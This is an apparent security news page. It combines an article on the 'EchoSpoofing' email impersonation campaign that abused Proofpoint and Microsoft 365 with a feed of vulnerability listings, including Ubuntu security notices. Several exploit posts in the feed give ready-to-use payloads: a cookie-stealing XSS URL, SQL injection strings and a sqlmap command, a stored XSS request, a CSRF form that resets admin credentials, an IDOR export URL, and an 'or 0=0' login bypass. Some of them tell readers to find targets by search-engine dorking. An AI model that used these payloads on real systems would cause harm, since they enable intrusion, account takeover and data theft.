A simple toggle in Proofpoint's email service allowed for brand impersonation at an industrial scale. It prompts the question: Are secure email gateways (SEGs) secure enough?

Source: Cheryl Ann Quigley via Alamy Stock Photo

Millions of near-undetectable emails impersonating blue chip companies were spreading every day through the first half of 2024, thanks to some permissive features of Microsoft 365 and Proofpoint's email protection service.

Proofpoint's secure email gateway (SEG) is a kind of firewall for corporate emails, filtering what comes in and applying authentication to what goes out. Recently, though, researchers from Guardio uncovered a campaign undermining that outbound part, utilizing a "super-permissive misconfiguration flaw" to send credit-card scam emails that were signed and verified as if they came from legitimate, brand name corporate accounts.

"It puts recipients in a weird place," says Adam Maruyama, field CTO at Garrison Technology. "You can receive a spoofed email and be affected, even if you've done your full \[cybersecurity\] due diligence to try to protect yourself."

Proofpoint has since implemented a fix which has all but killed the campaign, but some broader questions around email security linger.

**How "EchoSpoofing" Worked**

"There's not been a lot that has changed in the underlying infrastructure of what email is since it first started," says Jeremy Fuchs, office of the CTO at Check Point Software. For example, "The sender address in an email is kind of like the sender address in snail mail. I could send you a letter and say it's coming from the North Pole, and there really wouldn't be anything anyone could do to stop it. It's not that simple in the digital world, but it's still fairly easy." 

In the campaign, which Guardio called "EchoSpoofing," the attacker took advantage of this fact by setting up their own Simple Mail Transfer Protocol (SMTP) server on a virtual server. From there, they could send out emails with whatever "From" header they wished — for example, a fake customer service account coming from an @disney.com or @northpole.cool domain.

Of course, any modern security solution that employs anti-spoofing technology like Domain-based Message Authentication Reporting & Conformance (DMARC) monitoring or spam filter would catch suspicious emails coming from a random server. But this is where the EchoSpoofing vulnerability comes into play.

It turned out that Proofpoint's SEG contained a toggle which, when turned on, trusted any emails routing through Microsoft Office 365. Microsoft 365 is a commonly used mail service among businesses, but anybody — including a hacker — can also use it. Thus, if a hacker could send mail through Microsoft to a Proofpoint customer, it would be trusted by default and passed along.

This is where mail exchange (MX) records came in handy. MX records in the Domain Name System (DNS) specify the mail servers responsible for handling email for a domain. Companies that use Proofpoint SEG send their MX records to Proofpoint's servers. These records are public so, Fuchs observes, "they weren't just guessing about who to target. They knew exactly who they could target."

In summary: the attacker forged emails mimicking major corporations (including Disney, Best Buy, ESPN, IBM, Coca Cola, Nike, Fox News, and dozens more) from a private SMTP server, then relayed them through Microsoft 365 to known Proofpoint customers. If the customer had the "super-permissive" setting toggled on, Proofpoint would stamp the malicious emails with the same Domain Keys Identified Mail (DKIM) verification it would legitimate emails, then sent them on to victim inboxes.

**Millions of Fake Emails a Day**

The EchoSpoofing campaign began in January, and was first discovered by Proofpoint itself in late March. At that point, the company explained in a blog post, it took a number of steps to notify and protect customers.

But those efforts did not stem the tide of attacks. In fact, the forged emails only grew in number — averaging three million per week, and occasionally surpassing ten million.

Source: Guardio

Dark Reading reached out to Proofpoint for more information on why email attacks only rose after its initial remediation efforts began. Proofpoint representatives pointed Dark Reading to passages of its blog, and did not provide further comment.

Perhaps the campaign survived because the attacker had a keen operational awareness. As Guardio explained, "Once it finds a vulnerable Proofpoint account (by testing out this exploit on a small scale), it saves the domain for later use, forcing time gaps between delivery opportunities. It switches abused domains and Office365 accounts each time, making it harder to spot the activity and trying to stay 'under the radar' as much as possible."

This diligence may have been the key to the campaign's staying power, even after it had been detected. "It was quite interesting to see how, once the campaign was spotted and Proofpoint customers started to patch and block this exploit, the threat actor realized the decline and started burning out assets — realizing 'the end is near' — as can be seen with the disney.com domain usage in the above graph in early June 2024."

EchoSpoofing finally seems to have died down recently, after Proofpoint introduced a vendor-specific header for outgoing emails. Now, customers can restrict the 365 accounts allowed to send emails on their behalf to only their own.

**Being Diligent About Corporate Email**

Besides permissiveness, negligence too paved the way for the EchoSpoofers.

According to Guardio, despite Proofpoint's efforts to alert Microsoft, the attackers' maliciously-wielded Office365 accounts remain active many months later. In a statement to Dark Reading, a Microsoft spokesperson claimed that "When our partner alerted us to this issue, we took immediate action to investigate. We blocked tenants abusing our service and disabled accounts deemed fraudulent."

Then there were the companies that were victims of being spoofed. As Nati Tal, head of Guardio Labs, notes, they weren't powerless to detect millions of fake emails impersonating their brands. "In this case, if someone from Disney or wherever was looking at the amount of emails being sent out from their ProofPoint \[server\], it would probably have popped out immediately, at the first moment. You would see some kind of anomaly."

That, he says, should be a lesson that "You need to implement some kind of logging, some kind of data tracking for your email distribution."

Organizations that don't implement secure email controls like DMARC monitoring risk far greater cyber consequences than EchoSpoofing has demonstrated thus far. As Maruyama reflects, "I think my concern is that these have been pretty generic spam attacks. 'Click here', then they try to steal your credit card number. I could see a world in which a more sophisticated actor would save a similar vulnerability to do very targeted spear phishing to, for example, get emails through that look like they are from the government and defense services, targeted toward individuals in the Pentagon, DHS, etc. That is a much bigger threat, with due respect to folks who've had credit cards stolen here."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Disney, Nike, IBM Signatures Anchor 3M Fake Emails a Day

This is the official vulnerability disclosure report for CVEs CVE-2024-38881 through CVE-2024-38891 by jTag Labs. This report details critical security vulnerabilities found within Caterease Software, a product of Horizon Business Services Inc. These vulnerabilities have significant implications for the confidentiality, integrity, and availability of the software and the sensitive data it handles. The issues include problems like remote SQL injection, command injection, authentication bypass, hard-coded credentials, and more.

Caterease Software SQL Injection / Command Injection / Bypass

Tourism Management System version 2.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Tourism Management System v2.0 - Cross Site Scripting (XSS)# Date: 13 July 2024# Exploit Author: Sampath kumar kadajari# Vendor Homepage: https://phpgurukul.com/tourism-management-system-free-download/# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7204 # Version: v2.0# CVE: CVE-2024-41333# Tested on: Windows, XAMPP, Apache, MySQL-------------------------------------------------------------------------------------------------------------------------------------------A reflected cross-site scripting (XSS) vulnerability in Phpgurukul Tourism Management System v2.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the uname parameter."Vulnerable Code" – (/admin/user-bookings.php)<h2>Manage <?php echo $_GET['uname'];?>'s Bookings</h2>---> Affected Component: http://localhost/tms/admin/user-bookings.php?uid=manju@gmail.com&&uname=%22%3E%3Cimg%20src/onerror=prompt(document.cookie)%3E "Fix for Vulnerable Code" <h2>Manage <?php echo htmlspecialchars($_GET['uname'], ENT_QUOTES, 'UTF-8'); ?>'s Bookings</h2>

Tourism Management System 2.0 Cross Site Scripting

Ubuntu Security Notice 6909-2 - USN-6909-1 fixed several vulnerabilities in Bind. This update provides the corresponding update for Ubuntu 18.04 LTS. Toshifumi Sakaguchi discovered that Bind incorrectly handled having a very large number of RRs existing at the same time. A remote attacker could possibly use this issue to cause Bind to consume resources, leading to a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6909-2August 01, 2024bind9 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:Several security issues were fixed in Bind.Software Description:- bind9: Internet Domain Name ServerDetails:USN-6909-1 fixed several vulnerabilities in Bind. This update providesthe corresponding update for Ubuntu 18.04 LTS.Original advisory details: Toshifumi Sakaguchi discovered that Bind incorrectly handled having a very large number of RRs existing at the same time. A remote attacker could possibly use this issue to cause Bind to consume resources, leading to a denial of service. (CVE-2024-1737) It was discovered that Bind incorrectly handled a large number of SIG(0) signed requests. A remote attacker could possibly use this issue to cause Bind to consume resources, leading to a denial of service. (CVE-2024-1975)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS  bind9                           1:9.11.3+dfsg-1ubuntu1.19+esm4                                  Available with Ubuntu ProThis update uses a new upstream release, which includes additional bugfixes. In general, a standard system update will make all the necessarychanges.References:  https://ubuntu.com/security/notices/USN-6909-2  https://ubuntu.com/security/notices/USN-6909-1  CVE-2024-1737, CVE-2024-1975

Ubuntu Security Notice USN-6909-2

Leads Manager Tool suffers from remote SQL injection and cross site scripting vulnerabilities.

    [x]========================================================================================================================================[x] | Title        : Leads Manager Tool SQL & XSS[stored)] Vulnerabilities | Software     : Leads Manager Tool Using PHP and MySQL with Source Code | Create By  : https://www.sourcecodester.com/users/remyandrade | First Release: 25/01/22 | Download     : https://www.sourcecodester.com/php/17510/leads-manager-tool-using-php-and-mysql-source-code.html | Date         : 30 Agustus 2024 | Author       : OoN_Boy[x]========================================================================================================================================[x] | Technology       : PHP | Database         : MySQL | Price            : FREE | Description      : Leads Manager Tool, a comprehensive web application designed to streamline the process of managing business leads. Built with the power of PHP and MySQL, this tool offers a seamless and user-friendly experience for storing, updating, and organizing lead information[x]========================================================================================================================================[x][O] Exploit    http://localhost/leads-manager-tool/endpoint/delete-leads.php?leads=[SQL]  http://localhost/leads-manager-tool/endpoint/add-leads.php    [O] Proof of concept  [SQL]  Parameter: leads (GET)    Type: boolean-based blind  Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause  Payload: leads= --emurate' RLIKE (SELECT (CASE WHEN (8305=8305) THEN 0x202d2d656d7572617465 ELSE 0x28 END))-- rUwl  Type: error-based  Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  Payload: leads= --emurate' OR (SELECT 1382 FROM(SELECT COUNT(*),CONCAT(0x7162787171,(SELECT (ELT(1382=1382,1))),0x7176706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- vKls  Type: stacked queries  Title: MySQL >= 5.0.12 stacked queries (comment)  Payload: leads= --emurate';SELECT SLEEP(5)#  Type: time-based blind  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  Payload: leads= --emurate' AND (SELECT 1244 FROM (SELECT(SLEEP(5)))fAev)-- ZNBt    [XSS]    POST /leads-manager-tool/endpoint/add-leads.php HTTP/1.1  Host: 127.0.0.1  Accept-Encoding: gzip, deflate, br  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  Accept-Language: en-US;q=0.9,en;q=0.8  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36  Connection: close  Cache-Control: max-age=0  Origin: http://127.0.0.1  Upgrade-Insecure-Requests: 1  Referer: http://127.0.0.1/leads-manager-tool/  Content-Type: application/x-www-form-urlencoded  Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="126", "Chromium";v="126"  Sec-CH-UA-Platform: Windows  Sec-CH-UA-Mobile: ?0  Content-Length: 85  leads_name=Vrs<script>alert(1)</script>Hck&email_add=vrs-hck@maho.id&phone_number=911-911-9111    [x]========================================================================================================================================[x][O] GreetzBatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^[x]========================================================================================================================================[x]

Leads Manager Tool SQL Injection / Cross Site Scripting

Ubuntu Security Notice 6926-2 - 黄思聪 discovered that the NFC Controller Interface implementation in the Linux kernel did not properly handle certain memory allocation failure conditions, leading to a null pointer dereference vulnerability. A local attacker could use this to cause a denial of service. It was discovered that a race condition existed in the Bluetooth subsystem in the Linux kernel when modifying certain settings values through debugfs. A privileged local attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6926-2August 01, 2024linux-azure, linux-azure-4.15 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS- Ubuntu 14.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure-4.15: Linux kernel for Microsoft Azure Cloud systems- linux-azure: Linux kernel for Microsoft Azure Cloud systemsDetails:黄思聪 discovered that the NFC Controller Interface (NCI) implementation inthe Linux kernel did not properly handle certain memory allocation failureconditions, leading to a null pointer dereference vulnerability. A localattacker could use this to cause a denial of service (system crash).(CVE-2023-46343)It was discovered that a race condition existed in the Bluetooth subsystemin the Linux kernel when modifying certain settings values through debugfs.A privileged local attacker could use this to cause a denial of service.(CVE-2024-24857, CVE-2024-24858, CVE-2024-24859)Chenyuan Yang discovered that the Unsorted Block Images (UBI) flash devicevolume management subsystem did not properly validate logical eraseblocksizes in certain situations. An attacker could possibly use this to cause adenial of service (system crash). (CVE-2024-25739)Supraja Sridhara, Benedict Schlüter, Mark Kuhne, Andrin Bertschi, andShweta Shinde discovered that the Confidential Computing framework in theLinux kernel for x86 platforms did not properly handle 32-bit emulation onTDX and SEV. An attacker with access to the VMM could use this to cause adenial of service (guest crash) or possibly execute arbitrary code.(CVE-2024-25744)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - GPU drivers;  - HID subsystem;  - I2C subsystem;  - MTD block device drivers;  - Network drivers;  - TTY drivers;  - USB subsystem;  - File systems infrastructure;  - F2FS file system;  - SMB network file system;  - BPF subsystem;  - B.A.T.M.A.N. meshing protocol;  - Bluetooth subsystem;  - Networking core;  - IPv4 networking;  - IPv6 networking;  - Netfilter;  - Unix domain sockets;  - AppArmor security module;(CVE-2024-26884, CVE-2024-26882, CVE-2024-26923, CVE-2024-26840,CVE-2023-52435, CVE-2024-35984, CVE-2024-26886, CVE-2023-52752,CVE-2023-52436, CVE-2024-36016, CVE-2024-26857, CVE-2024-36902,CVE-2023-52443, CVE-2024-35997, CVE-2024-35982, CVE-2023-52469,CVE-2024-27020, CVE-2024-35978, CVE-2024-26934, CVE-2024-27013,CVE-2023-52449, CVE-2024-26901, CVE-2023-52444, CVE-2023-52620)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS  linux-image-4.15.0-1179-azure   4.15.0-1179.194                                  Available with Ubuntu Pro  linux-image-azure-lts-18.04     4.15.0.1179.147                                  Available with Ubuntu ProUbuntu 14.04 LTS  linux-image-4.15.0-1179-azure   4.15.0-1179.194~14.04.1                                  Available with Ubuntu Pro  linux-image-azure               4.15.0.1179.194~14.04.1                                  Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-6926-2  https://ubuntu.com/security/notices/USN-6926-1  CVE-2023-46343, CVE-2023-52435, CVE-2023-52436, CVE-2023-52443,  CVE-2023-52444, CVE-2023-52449, CVE-2023-52469, CVE-2023-52620,  CVE-2023-52752, CVE-2024-24857, CVE-2024-24858, CVE-2024-24859,  CVE-2024-25739, CVE-2024-25744, CVE-2024-26840, CVE-2024-26857,  CVE-2024-26882, CVE-2024-26884, CVE-2024-26886, CVE-2024-26901,  CVE-2024-26923, CVE-2024-26934, CVE-2024-27013, CVE-2024-27020,  CVE-2024-35978, CVE-2024-35982, CVE-2024-35984, CVE-2024-35997,  CVE-2024-36016, CVE-2024-36902

Ubuntu Security Notice USN-6926-2

Readymade Unilevel Ecommerce MLM suffers from remote blind SQL injection and cross site scripting vulnerabilities. These issues affected the version released as late as March 15, 2024.

    [x]========================================================================================================================================[x] | Title        : Readymade Unilevel Ecommerce MLM Blind SQL & XSS Vulnerabilities | Software     : Readymade Unilevel Ecommerce | Last Update  : 15/03/24 [TESTED VERSION SCRIPT] | First Release: 16/11/21 | Vendor       : http://www.i-netsolution.com/ | Date         : 01 Agustus 2024 | Author       : OoN_Boy[x]========================================================================================================================================[x] | Technology       : PHP | Database         : MySQL | Price            : $500 | Description      : MLM Unilevel Plan Script developed by experts and professionals. Rather than building your business from the scratch, make use of our Unilevel MLM PHP Script to launch your MLM business.[x]========================================================================================================================================[x][O] Exploit    http://localhost/eommlm/product-details.php?id=11[SQL]  http://localhost/ecomlm/product-details.php?id=11[XSS]  [O] Proof of concept    sqlmap.py -u "http://localhost/eommlm/product-details.php?id=11" --invalid-string    [SQL]  Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=11 AND 1189=1189    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: id=11;SELECT SLEEP(10)#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=11 AND (SELECT 6812 FROM (SELECT(SLEEP(10)))DddL)    [XSS]    http://localhost/ecomlm/product-details.php?id=11"><img/src/onerror=.1|alert`VrsHckGAY`+class=VrsHckGAY>    [x]========================================================================================================================================[x][O] GreetzBatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^[x]========================================================================================================================================[x]

ReadyMade Unilevel Ecommerce MLM Blind SQL Injection / Cross Site Scripting

Appointment Scheduler version 3.0 suffers from an insecure direct object reference vulnerability.

    =============================================================================================================================================| # Title     : Appointment Scheduler v3.0 IDOR Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://auth.phpjabbers.com/download/727641/53089/d9b13cca42bb941a9f06d96f22fb7743                                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : Allows you as a visitor to access the control panel without permissions.[+] use payload : index.php?controller=pjAdminBookings&action=pjActionExport[+] http://127.0.0.1/www/ wongkit.com.hk/appointment/index.php?controller=pjAdminBookings&action=pjActionExportGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Appointment Scheduler 3.0 Insecure Direct Object Reference

AccPack Cop version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : AccPack Cop v1.0 CSRF Vulnerability                                                                                         |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : http://webpay.com.np/#Product                                                                                               |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML code modifies the admin information.

[+] Go to the line 5. Set the target site link Save changes and apply . 

[+] infected file : cms/user/modify.php.

[+] http://127.0.0.1/q7.3/cms/user/modify.php.

[+] save code as poc.html 

[+] payload : 

</head>  
<body>  
  <div class="container">  
    <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div>  
    <form action="https://tssclahanorgnp/cms/user/modify.php" method="POST"  enctype="multipart/form-data">  
      <div hidden="true">  
        <input type="text" name="id" id="id" value="1">  
      </div>  
       <div>  
        <label for='email'>Email</label><input  type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz">  
       </div>  
       <div>  
        <label for='password'>Password</label><input  type="text" class="form-control" name='password' id='password' type='password' value="123456">  
       </div>  
       <tr>  
       <div>  
        <label for='status'>Status</label>  
          <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label>  
          <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label>

               </div>     
       <div style='height:80'>  
        <input type='submit' value='Submit'><input type='reset' Value='Reset'>  
       </div>  
    </form>  
  </div>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

AccPack Cop 1.0 Cross Site Request Forgery

AccPack Buzz version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : AccPack Buzz v1.0 Auth By Pass Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1/jamiatulamanepal.orgnp/cms/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#vulnerability